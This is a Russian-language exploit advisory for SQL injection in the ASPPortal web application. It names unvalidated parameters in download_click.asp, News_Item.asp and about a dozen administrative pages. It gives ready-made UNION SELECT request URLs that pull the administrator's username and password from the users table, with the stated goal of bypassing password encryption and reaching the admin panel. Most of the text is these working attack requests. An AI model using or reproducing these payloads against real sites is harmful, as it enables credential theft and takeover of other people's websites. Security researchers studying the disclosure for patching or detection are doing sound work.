Уязвимость:
Ошибка представляет собой возможность SQL-инъекции в модуле ASPPoratl.
Используя эту уязвимость, атакующий может преобразовать код SQL-запроса.
Эта уязвимость даёт возможность получить пароли обойдя шифровальный
механизм ASPPortal.
Как можно заметить, в модуле загрузки download_click.asp и модуле
новостей News_Item.asp существует параметр content_ID, который не
проверяется. Используя эти две ошибки мы можем получить доступ к панели
администратирования.
Использование:
GET ->
http://[Сайт]/apdir/content/downloads/download_click.asp?downloadid=[SQL-код]
GET ->
http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQL-код]
Пример ->
http://[Сайт]/apdir/content/downloads/download_click.asp?downloadid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,
password+FROM+users+where+username='admin'
Пример ->
http://[Сайт]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELECT+username,password,0,0,
group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin'
ADMINGET ->
http://[сайт]/apdir/content/users/add_edit_user.asp?page_type=2&user_id=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&bannerid=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_id=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/News/add_edit_news.asp?page_type=2&Content_ID=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/downloads/add_edit_download.asp?page_type=2&download_id=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[SQL-код]
ADMINGET ->
http://[сайт]/apdir/content/contactus/contactus_add_edit.asp?contactid=[SQL-код]&pageid=2
ADMINGET ->
http://[сайт]/apdir/content/poll/poll_list.asp?sortby=[SQL-код]&page_no=1
ADMINPOST ->
http://[сайт]/apdir/content/downloads/add_edit_download.asp?page_type=1